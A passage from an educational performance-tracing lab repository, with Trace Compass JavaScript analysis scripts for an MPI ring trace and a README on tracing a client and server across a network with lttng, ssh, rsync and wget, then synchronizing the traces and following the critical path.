https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/changeJavascriptEngine.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/customTraceOpened.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/customTraceOpened.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/enginesAndModules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/enginesAndModules.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/installPlugIn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/installPlugIn.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFile.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFileName.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFileName.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/runAsScript.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/runAsScript.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputConsole.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputConsole.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputEventsConsole.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputEventsConsole.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraph.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraphArrows.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraphArrows.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/stateSystemExplorer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/stateSystemExplorer.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step1_readTrace.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | 10 | // Get the active trace 11 | var trace = getActiveTrace() 12 | 13 | // Get an event iterator on that trace 14 | var iter = getEventIterator(trace) 15 | 16 | // Iterate through the events 17 | var event = null 18 | while (iter.hasNext()) { 19 | event = iter.next() 20 | 21 | // For each event, print the name and the field names 22 | eventString = event.getName() + " --> ( " 23 | 24 | var fieldsIterator = event.getContent().getFieldNames().iterator() 25 | while (fieldsIterator.hasNext()) { 26 | eventString += fieldsIterator.next() + " " 27 | } 28 | eventString += ")" 29 | 30 | print(eventString); 31 | } 32 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step2_readEvents.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | 10 | // Get the active trace 11 | var trace = getActiveTrace() 12 | 13 | // Get an event iterator on that trace 14 | var iter = getEventIterator(trace) 15 | // Associate a TID with an mpi worker 16 | var tidToWorkerMap = {}; 17 | 18 | // Iterate through the events 19 | var event = null 20 | while (iter.hasNext()) { 21 | event = iter.next() 22 | 23 | eventName = event.getName() 24 | if (eventName == "ring:init") { 25 | tid = getEventFieldValue(event, "context._vtid") 26 | worker_id = getEventFieldValue(event, "worker_id") 27 | tidToWorkerMap[tid] = worker_id 28 | print("Init -> tid: " + tid + ", worker_id: " + worker_id) 29 | } else if (eventName == "ring:recv_entry") { 30 | tid = getEventFieldValue(event, "context._vtid") 31 | worker_id = tidToWorkerMap[tid] 32 | print("Entering Reception -> tid: " + tid+ ", worker_id: " + worker_id) 33 | } else if (eventName == "ring:recv_exit") { 34 | tid = getEventFieldValue(event, "context._vtid") 35 | worker_id = tidToWorkerMap[tid] 36 | source = getEventFieldValue(event, "source") 37 | print("Exiting Reception -> tid: " + tid + ", worker_id: " + worker_id + ", source: " + source) 38 | } else if (eventName == "ring:send_entry") { 39 | tid = getEventFieldValue(event, "context._vtid") 40 | worker_id = tidToWorkerMap[tid] 41 | dest = getEventFieldValue(event, "dest") 42 | print("Entering Send -> tid: " + tid + ", worker_id: " + worker_id + ", dest: " + dest) 43 | } else if (eventName == "ring:send_exit") { 44 | tid = getEventFieldValue(event, "context._vtid") 45 | worker_id = tidToWorkerMap[tid] 46 | print("Exiting Send -> tid: " + tid + ", worker_id: " + worker_id) 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step3_stateSystem.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | loadModule("/TraceCompass/Analysis") 10 | 11 | // Get the active trace 12 | var trace = getActiveTrace() 13 | 14 | // Get an event iterator on that trace 15 | var iter = getEventIterator(trace) 16 | // Associate a TID with an mpi worker 17 | var tidToWorkerMap = {}; 18 | 19 | //Get an analysis 20 | var analysis = createScriptedAnalysis(trace, "ringTimeLine.js") 21 | // Get the analysis's state system so we can fill it, false indicates to create a new state system even if one already exists 22 | var ss = analysis.getStateSystem(false); 23 | 24 | // Iterate through the events 25 | var event = null 26 | while (iter.hasNext()) { 27 | event = iter.next() 28 | 29 | eventName = event.getName() 30 | if (eventName == "ring:init") { 31 | tid = getEventFieldValue(event, "context._vtid") 32 | worker_id = getEventFieldValue(event, "worker_id") 33 | tidToWorkerMap[tid] = worker_id 34 | } else if (eventName == "ring:recv_entry") { 35 | tid = getEventFieldValue(event, "context._vtid") 36 | worker_id = tidToWorkerMap[tid] 37 | // Save the state of the resource as waiting for reception 38 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 39 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Waiting for reception", quark); 40 | } else if (eventName == "ring:recv_exit") { 41 | tid = getEventFieldValue(event, "context._vtid") 42 | worker_id = tidToWorkerMap[tid] 43 | source = getEventFieldValue(event, "source") 44 | // Remove the waiting for reception state 45 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 46 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 47 | } else if (eventName == "ring:send_entry") { 48 | tid = getEventFieldValue(event, "context._vtid") 49 | worker_id = tidToWorkerMap[tid] 50 | dest = getEventFieldValue(event, "dest") 51 | // Save the state of the resource as sending 52 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 53 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Sending", quark); 54 | } else if (eventName == "ring:send_exit") { 55 | tid = getEventFieldValue(event, "context._vtid") 56 | worker_id = tidToWorkerMap[tid] 57 | // Remove the sending for reception state 58 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 59 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 60 | } 61 | } 62 | 63 | // Done parsing the events, close the state system at the time of the last event, it needs to be done manually otherwise the state system will still be waiting for values and will not be considered finished building 64 | if (event != null) { 65 | ss.closeHistory(event.getTimestamp().toNanos()); 66 | } 67 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step4_timeLine.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | loadModule("/TraceCompass/Analysis") 10 | loadModule("/TraceCompass/DataProvider") 11 | loadModule("/TraceCompass/View") 12 | 13 | // Get the active trace 14 | var trace = getActiveTrace() 15 | 16 | // Get an event iterator on that trace 17 | var iter = getEventIterator(trace) 18 | // Associate a TID with an mpi worker 19 | var tidToWorkerMap = {}; 20 | 21 | //Get an analysis 22 | var analysis = createScriptedAnalysis(trace, "ringTimeLine.js") 23 | // Get the analysis's state system so we can fill it, false indicates to create a new state system even if one already exists 24 | var ss = analysis.getStateSystem(false); 25 | 26 | // Iterate through the events 27 | var event = null 28 | while (iter.hasNext()) { 29 | event = iter.next() 30 | 31 | eventName = event.getName() 32 | if (eventName == "ring:init") { 33 | tid = getEventFieldValue(event, "context._vtid") 34 | worker_id = getEventFieldValue(event, "worker_id") 35 | tidToWorkerMap[tid] = worker_id 36 | } else if (eventName == "ring:recv_entry") { 37 | tid = getEventFieldValue(event, "context._vtid") 38 | worker_id = tidToWorkerMap[tid] 39 | // Save the state of the resource as waiting for reception 40 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 41 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Waiting for reception", quark); 42 | } else if (eventName == "ring:recv_exit") { 43 | tid = getEventFieldValue(event, "context._vtid") 44 | worker_id = tidToWorkerMap[tid] 45 | source = getEventFieldValue(event, "source") 46 | // Remove the waiting for reception state 47 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 48 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 49 | } else if (eventName == "ring:send_entry") { 50 | tid = getEventFieldValue(event, "context._vtid") 51 | worker_id = tidToWorkerMap[tid] 52 | dest = getEventFieldValue(event, "dest") 53 | // Save the state of the resource as sending 54 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 55 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Sending", quark); 56 | } else if (eventName == "ring:send_exit") { 57 | tid = getEventFieldValue(event, "context._vtid") 58 | worker_id = tidToWorkerMap[tid] 59 | // Remove the sending for reception state 60 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 61 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 62 | } 63 | } 64 | 65 | // Done parsing the events, close the state system at the time of the last event, it needs to be done manually otherwise the state system will still be waiting for values and will not be considered finished building 66 | if (event != null) { 67 | ss.closeHistory(event.getTimestamp().toNanos()); 68 | } 69 | 70 | //Get a time graph provider from this analysis, displaying all attributes 71 | //Create a map and fill it, because javascript map cannot use the EASE constants as keys 72 | var map = new java.util.HashMap(); 73 | map.put(ENTRY_PATH, '*'); 74 | provider = createTimeGraphProvider(analysis, map); 75 | if (provider != null) { 76 | // Open a time graph view displaying this provider 77 | openTimeGraphView(provider); 78 | } 79 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step5_timeGraphArrow.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | loadModule("/TraceCompass/Analysis") 10 | loadModule("/TraceCompass/DataProvider") 11 | loadModule("/TraceCompass/View") 12 | loadModule('/TraceCompass/Utils'); 13 | 14 | // Get the active trace 15 | var trace = getActiveTrace() 16 | 17 | // Get an event iterator on that trace 18 | var iter = getEventIterator(trace) 19 | // Associate a TID with an mpi worker 20 | var tidToWorkerMap = {}; 21 | 22 | //Get an analysis 23 | var analysis = createScriptedAnalysis(trace, "ringTimeLine.js") 24 | // Get the analysis's state system so we can fill it, false indicates to create a new state system even if one already exists 25 | var ss = analysis.getStateSystem(false); 26 | 27 | //Save information on the pending arrows 28 | var pendingArrows = {}; 29 | //Variable to save the arrow information 30 | var arrows = []; 31 | 32 | // Iterate through the events 33 | var event = null 34 | while (iter.hasNext()) { 35 | event = iter.next() 36 | 37 | eventName = event.getName() 38 | if (eventName == "ring:init") { 39 | tid = getEventFieldValue(event, "context._vtid") 40 | worker_id = getEventFieldValue(event, "worker_id") 41 | tidToWorkerMap[tid] = worker_id 42 | } else if (eventName == "ring:recv_entry") { 43 | tid = getEventFieldValue(event, "context._vtid") 44 | worker_id = tidToWorkerMap[tid] 45 | // Save the state of the resource as waiting for reception 46 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 47 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Waiting for reception", quark); 48 | } else if (eventName == "ring:recv_exit") { 49 | tid = getEventFieldValue(event, "context._vtid") 50 | worker_id = tidToWorkerMap[tid] 51 | source = getEventFieldValue(event, "source") 52 | // Remove the waiting for reception state 53 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 54 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 55 | // Complete an arrow if the start was available 56 | pending = pendingArrows[worker_id]; 57 | if (pending != null) { 58 | // There is a pending arrow (ie send) for this message 59 | pendingArrows[worker_id] = null; 60 | pending["endTime"] = event.getTimestamp().toNanos(); 61 | arrows.push(pending); 62 | } 63 | 64 | } else if (eventName == "ring:send_entry") { 65 | tid = getEventFieldValue(event, "context._vtid") 66 | worker_id = tidToWorkerMap[tid] 67 | dest = getEventFieldValue(event, "dest") 68 | // Save the state of the resource as sending 69 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 70 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Sending", quark); 71 | 72 | // Save a pending arrow 73 | pendingArrows[dest] = {"time" : event.getTimestamp().toNanos(), "source" : worker_id, "dest" : dest}; 74 | } else if (eventName == "ring:send_exit") { 75 | tid = getEventFieldValue(event, "context._vtid") 76 | worker_id = tidToWorkerMap[tid] 77 | // Remove the sending for reception state 78 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 79 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 80 | } 81 | } 82 | 83 | // Done parsing the events, close the state system at the time of the last event, it needs to be done manually otherwise the state system will still be waiting for values and will not be considered finished building 84 | if (event != null) { 85 | ss.closeHistory(event.getTimestamp().toNanos()); 86 | } 87 | 88 | // Get list wrappers from Trace Compass for the entries and arrows. The conversion between javascript list and java list is not direct, so we need a wrapper 89 | var tgEntries = createListWrapper(); 90 | var tgArrows = createListWrapper(); 91 | 92 | /* Prepare the time graph data, there is few enough entries and arrows that it can be done once and returned once */ 93 | 94 | // Map the worker ID to an entry ID 95 | var mpiWorkerToId = {}; 96 | 97 | // Get all the quarks of the entries 98 | quarks = ss.getQuarks("*"); 99 | // Prepare the entries 100 | var mpiEntries = []; 101 | for (i = 0; i < quarks.size(); i++) { 102 | quark = quarks.get(i); 103 | // Get the mpi worker ID, and find its quark 104 | mpiWorkerId = ss.getAttributeName(quark); 105 | // Create an entry with the worker ID as name and the quark. The quark will be used to populate the entry's data. 106 | entry = createEntry(mpiWorkerId, {'quark' : quark}); 107 | mpiWorkerToId[mpiWorkerId] = entry.getId(); 108 | mpiEntries.push(entry); 109 | } 110 | // Sort the entries numerically 111 | mpiEntries.sort(function(a,b){return Number(a.getName()) - Number(b.getName())}); 112 | // Add the entries to the entry list 113 | for (i = 0; i < mpiEntries.length; i++) { 114 | tgEntries.getList().add(mpiEntries[i]); 115 | } 116 | 117 | // Prepare the arrows 118 | for (i=0; i < arrows.length; i++) { 119 | arrow = arrows[i]; 120 | 121 | // For each arrow, we get the source and destination entry ID from its mpi worker ID 122 | srcId = mpiWorkerToId[arrow["source"]]; 123 | dstId = mpiWorkerToId[arrow["dest"]]; 124 | // Get the start time and calculate the duration 125 | startTime = arrow["time"]; 126 | duration = arrow["endTime"] - startTime; 127 | // Add the arrow to the arrows list 128 | tgArrows.getList().add(createArrow(srcId, dstId, startTime, duration, 1)); 129 | } 130 | 131 | // A function used to return the entries to the data provider. It receives the filter in parameter, which contains the requested time range and any additional information 132 | function getEntries(parameters) { 133 | // The list is static once built, return all entries 134 | return tgEntries.getList(); 135 | } 136 | 137 | // A function used to return the arrows to the data provider. It receives the filter in parameter, which contains the requested time range and any additional information 138 | function getArrows(parameters) { 139 | // Just return all the arrows, the view will take those in the range 140 | return tgArrows.getList(); 141 | } 142 | 143 | // Create a scripted data provider for this analysis, using script functions to get the entries, row model data and arrows. Since the entries have a quark associated with them which contains the data to display, there is no need for a scripted getRowData function, so we send null 144 | provider = createScriptedTimeGraphProvider(analysis, getEntries, null, getArrows); 145 | if (provider != null) { 146 | // Open a time graph view displaying this provider 147 | openTimeGraphView(provider); 148 | } 149 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/README.md: -------------------------------------------------------------------------------- 1 | ## Tracing System On Multiple Machines Across a Network 2 | 3 | In this lab, you will learn to take traces from multiple machines that communicate through the network and how Trace Compass can analyze those traces from different machines, with different time clocks. 4 | 5 | *Pre-requisites*: This lab is a follow-up of the [Tracing wget](../102-tracing-wget-critical-path) lab: we obtained 2 traces of wgetting a same web page twice. We saw that the 2 requests had 2 very different durations. Now, we will also trace the website that is being fetched to see what happens there during this request on the server side. For this lab, you can use the traces provided in this repository. The lab explains how to generate your own traces, but to do so, you would need to have 2 machines, preferably physical machines, as clocks on virtual machine are a bit trickier. 6 | 7 | - - - 8 | 9 | ### Task 1: Getting the trace 10 | 11 | While it is easy to just start an lttng session on one machine and obtain a local trace, tracing multiple machines requires more operations to control tracing and collect traces afterwards. There is no blessed way of doing this unfortunately; everyone develops their own techniques and writes their scripts. 12 | 13 | The easiest way is to start/stop tracing manually on each machine, run your workload, then stop the tracing. Of course, to do it really manually will result in traces that are longer than necessary if the workload is small, like in this case, but it can be a good approach to trace a situation that may happen in the coming minutes. Scripting the tracing will make smaller traces that span just the necessary time. 14 | 15 | We'll describe one possible approach to this kind of tracing here. We will trace 2 machines, one acting as a client (running the wget commands) and a server (serving the requests), so the tracing will be controlled from the client. We'll be using the 3 following bash scripts, that are also available in the [scripts](scripts/) directory: 16 | 17 | On the **server machine**, place the following script somewhere. We'll put it in the home ``~/`` directory and call it [`setupKernelTrace`](scripts/setupKernelTrace). This **creates a tracing session** with all required events. The trace will be saved to the trace directory sent in parameter (this allows to easily know where the trace is located, so how to retrieve it later), otherwise a name with the data will be computed for the trace. 18 | 19 | ``` 20 | #!/bin/bash 21 | 22 | NAME=$1 23 | 24 | if [ -z "$NAME" ] 25 | then 26 | NAME=trace_$(date +"%y%m%d_%H%M") 27 | fi 28 | 29 | lttng create --output ~/lttng-traces/$NAME 30 | lttng enable-channel --kernel --num-subbuf 8 --subbuf-size 1024K more-subbuf 31 | # scheduling 32 | lttng enable-event -k --channel more-subbuf sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup 33 | lttng enable-event -k --channel more-subbuf irq_softirq_entry,irq_softirq_raise,irq_softirq_exit 34 | lttng enable-event -k --channel more-subbuf irq_handler_entry,irq_handler_exit 35 | lttng enable-event -k --channel more-subbuf --syscall --all 36 | lttng enable-event -k --channel more-subbuf lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,lttng_statedump_interrupt 37 | # Block I/O 38 | lttng enable-event -k --channel more-subbuf block_rq_complete,block_rq_insert,block_rq_issue 39 | lttng enable-event -k --channel more-subbuf block_bio_frontmerge,sched_migrate,sched_migrate_task 40 | # cpu related 41 | lttng enable-event -k --channel more-subbuf power_cpu_frequency 42 | # network events 43 | lttng enable-event -k --channel more-subbuf net_dev_queue,netif_receive_skb,net_if_receive_skb 44 | # timer events 45 | lttng enable-event -k --channel more-subbuf timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 46 | # Additional events for wifi 47 | #lttng enable-event -k --channel more-subbuf --function netif_receive_skb_internal netif_receive_skb_internal 48 | #lttng enable-event -k --channel more-subbuf --function do_IRQ do_IRQ 49 | 50 | ``` 51 | 52 | On the **client machine** the following script will start the tracing on the server, then record a trace of the payload, finally stop the trace on the server and get the remote trace to this machine. We'll run it from the directory of your choice and save it as [`traceClientServer`](scripts/traceClientServer). 53 | 54 | ``` 55 | #!/bin/bash 56 | 57 | USER=$1 58 | SERVER=$2 59 | URL=$3 60 | if [ -z "$USER" ] || [ -z "$SERVER" ] || [ -z "$URL" ] 61 | then 62 | echo "Usage: ./traceClientServer " 63 | echo "" 64 | echo "Example: ./traceClientServer myUser 5.5.5.2 http://www.polymtl.ca" 65 | exit 0 66 | fi 67 | 68 | TRACE_NAME=serverTrace 69 | 70 | # Start tracing on the server side through ssh 71 | ssh $USER@$SERVER ./setupKernelTrace $TRACE_NAME 72 | ssh $USER@$SERVER lttng start 73 | # Record the client payload 74 | # If the client is a machine with wifi, replace this call to a full manual setup 75 | # of the kernel trace and uncomment the lines for the additional kernel --function lines 76 | lttng-record-trace ./payload $URL 77 | # Stop tracing the server 78 | ssh $USER@$SERVER lttng destroy 79 | 80 | # Get the trace from the server 81 | rsync -avz $USER@$SERVER:~/lttng-traces/$TRACE_NAME ./ 82 | ``` 83 | 84 | Finally, the following [`payload`](scripts/payload) script on the **client machine** will contain the payload to trace, here 2 wgets of a web site. This scripts should be in the same directory as the previous script. 85 | 86 | ``` 87 | #!/bin/bash 88 | 89 | SITE=$1 90 | 91 | wget $SITE 92 | sleep 1 93 | wget $SITE 94 | 95 | ``` 96 | 97 | After execution of those traces, you should have 2 traces on your working directory: one called ``payLoad-`` and one called ``serverTrace``, from respectively the client and the server. These 2 traces will be imported in Trace Compass in the next step. 98 | 99 | :grey_exclamation: If one of the machines connects to the network through wifi, the traces taken with the default events will not show the critical path through the network. To do so, additional events will be required. For now, with lttng 2.11 and below, **tracing the following kernel functions** should make the dependency analyses possible: 100 | 101 | ``` 102 | lttng enable-event -k --channel more-subbuf --function netif_receive_skb_internal netif_receive_skb_internal 103 | lttng enable-event -k --channel more-subbuf --function do_IRQ do_IRQ 104 | ``` 105 | 106 | - - - 107 | 108 | ### Task 2: Importing the traces in an experiment 109 | 110 | In Trace Compass, under the project on which to import the traces, right-click on the `Traces` folder. Select `Import...` to open the *Trace Import* wizard. 111 | 112 | Browse for the folder containing the traces, then check each folder containing the traces on the left side. You should have two folders checked. In the options below, make sure the **Create experiment** is checked, with an experiment in the textbox beside the option, as shown in the screenshot below. 113 | 114 | ![ImportExperiment](screenshots/importExperiment.png "Trace Compass Import Experiment") 115 | 116 | The traces will be imported. Then expand the *Experiments* folder to see the experiment that was just created with the 2 traces in it. Double-click on the experiment to open it. 117 | 118 | ![OpenExperiment](screenshots/openExperiment.png "Trace Compass Open Experiment") 119 | 120 | If you are using the traces provided with the tuturial, the ones we'll be using now are in the `301-tracing-multiple-machines` folder: `httpClient` and `httpServer`. To create an experiment with those 2, you can select them (by pressing `ctrl-left-click` on their names), then `right-click` and select `Open As Experiment...` -> `Generic Experiment`. It will automatically open the experiment with the 2 traces in it. 121 | 122 | ![OpenAsExperiment](screenshots/openAsExperiment.png "Trace Compass Open As Experiment") 123 | 124 | - - - 125 | 126 | ### Task 3: Synchronizing the traces 127 | 128 | The 2 traces were taken on different machines that communicated together using HTTP to get the web page. This means there will be events in the traces representing the exchange of TCP/IP packets, namely ``net_dev_queue`` and ``net[_]if_receive_skb`` for sending and receiving packets. The data in those events allow to match the event corresponding to the sending from one machine with the event corresponding to the reception on the other machine. 129 | 130 | Under the experiment, expand *Views*. There is an analysis called ``Event Matching Latency``. Expand it, then open the ``Event Matches Scatter Graph``. Make sure the trace is fully zoomed out and you should see two communication streams, check them to see the latencies. This analyses matches send and receive events and shows the latency between the 2 events. 131 | 132 | Unless the 2 machines' clocks are perfectly synchronized, the 2 streams should appear as 2 very distinct series, one of which may even be in the negatives. That means events are received before they are sent! 133 | 134 | ![EventMatchingNoSync](screenshots/eventMatchingNoSync.png "Event Matching Latencies No Sync") 135 | 136 | If the 2 machines are physical machines, they are independent and what happens on one does not affect the other. But in a case like ours, where they communicate through the network and we want to analyze the dependencies across the network, it is important that the timestamps of both traces use the same time reference, so that dependent events always happen in the right order (for example, a packet should always be sent before it is received). 137 | 138 | Trace Compass uses a *trace synchronization* algorithm to automatically calculate a formula to transform the timestamps of one trace into the time reference of the other trace. Before synchronizing, let's open the `Synchronization` view, by clicking the `Window` -> `Show view` (or type `Ctrl-3`) and type and select the ``Synchronization (Tracing)`` view. 139 | 140 | Right-click on the experiment and select `Synchronize traces...`. A window will open to select a reference trace. Any one will do in this case, so use the default selected one and click *Finish*. The trace synchronization task will run. It may take a while. At the end, the experiment will be closed. 141 | 142 | ![SynchronizeTraces](screenshots/synchronizeTraces.png "Synchronize traces") 143 | 144 | Open the experiment again, the ``Synchronization`` should show the result of the synchronization, which is hopefully ``accurate``, showing the number of packets matched and the number of packets that served to calculate the formula. 145 | 146 | ![SynchronizationResult](screenshots/synchronizationResults.png "Synchronization Results") 147 | 148 | Look at the ``Event Matches Scatter Graph`` view again. You should see now that both series overlap quite nicely and latencies are always positive. 149 | 150 | ![EventMatchingSync](screenshots/eventMatchingSync.png "Event Matching Latencies Sync") 151 | 152 | All the analyzes for this experiment will be re-run now that the traces are synchronized and this time, the timestamps will use the same time reference. 153 | 154 | - - - 155 | 156 | ### Task 4: Analyze the requests 157 | 158 | When analyzing experiments with traces from different machines, most views of Trace Compass will simply show data from both traces. For example, the ``Control Flow`` view will show all threads under an element corresponding to the trace name. The 2 traced machines being independent, there is little else to do for most views than to just aggregate the data of both traces. 159 | 160 | Where there is added value in having an experiment is to calculate the distributed critical path of a thread. We traced a web request, there is communication between the machines, we can follow the critical path from the client to the server and back to the client. 161 | 162 | Open the ``Control Flow`` view and the ``Critical Flow`` view (either with `Window` -> `Show View`, or ``ctrl-3`` and typing the view name, or expanding the corresponding analysis under the trace, ie ``Linux Kernel`` and ``OS Execution Graph``). 163 | 164 | With focus on the ``Control Flow`` view, find the *wget* processes: press ``Ctrl-f`` and type *wget* in the search box. It will select the first *wget* process. Right-click on the process and click on ``Follow wget/``. This will trigger the ``OS Execution Graph`` analysis and at the end, the distributed critical path for this wget request will be shown. 165 | 166 | The screenshot below shows the critical path of a web request to a drupal web site, showing a lot of communication between apache and mysql. 167 | 168 | ![CriticalPathWgetCold](screenshots/criticalPathWgetCold.png "Critical Path Wget Cold") 169 | 170 | In the *[Tracing wget](../102-tracing-wget-critical-path)*, we saw that most of the *wget* critical path was spent waiting on the network. Now with this experiment, that *waiting for network* part is replaced by the server side critical path, where the apache/mariadb processes each play a role. We see a lot of disk access. This request has not been made in a long time and its data, php code, as well as database, needs to be fetched from disk. 171 | 172 | Now in the ``Control Flow`` view, select the second *wget* process and right-click it to follow the process and calculate its critical path. This time, we see a lot less disk accesses on the server side, and thus a much shorter request than the first time. The data for the request was already on memory, which improves the query time. 173 | 174 | ![CriticalPathWgetHot](screenshots/criticalPathWgetHot.png "Critical Path Wget Hot") 175 | 176 | Now, this analysis was done only with kernel traces from the client and server. We can clearly see the network and disk accesses on the critical path. What a simple kernel trace does not say is whether the time improvement of the second request is only due to in-memory request data, or if the web application also did something to help increase the speed of the second query. Is there some mechanism in the application that improved the query time or is it just simply OS-related. Adding some userspace traces to this experiment could help dig deeper into the userspace parts of the request, show what was actually running, which tasks in the application made the database requests. For complex web requests made from a browser for instance, we could even have client side instrumentation that would tell us which browser tasks were responsible for the various http queries, etc. The possible userspace traces to add to this kind of analysis are as numerous and various as are the request framework and applications. 177 | 178 | - - - 179 | ### References: 180 | 181 | [Trace synchronization algorithm](http://dmct.dorsal.polymtl.ca/sites/dmct.dorsal.polymtl.ca/files/Jabbarifar-Dec6.pdf) 182 | 183 | **Additional notes on synchronization**: 184 | 185 | Note that the trace synchronization algorithm used in Trace Compass computes a linear formula to transform the timestamps. It is only an approximation, sufficient for the analyzes, as computer clocks do not have this linear correlation and after a while, a drift may appear between the clocks that will invalidate the linear formula. It means that at some point, it will be impossible to compute a linear formula covering the whole duration of the traces and the synchronization will be marked as ``failed``. Depending on the hardware, the approximation here can be valid for trace durations varying from minutes to hours. 186 | 187 | When dealing with virtual machines, the synchronization approach described here is rarely successful even for traces of a few seconds. The drift factors enters in very soon. Luckily in those cases, 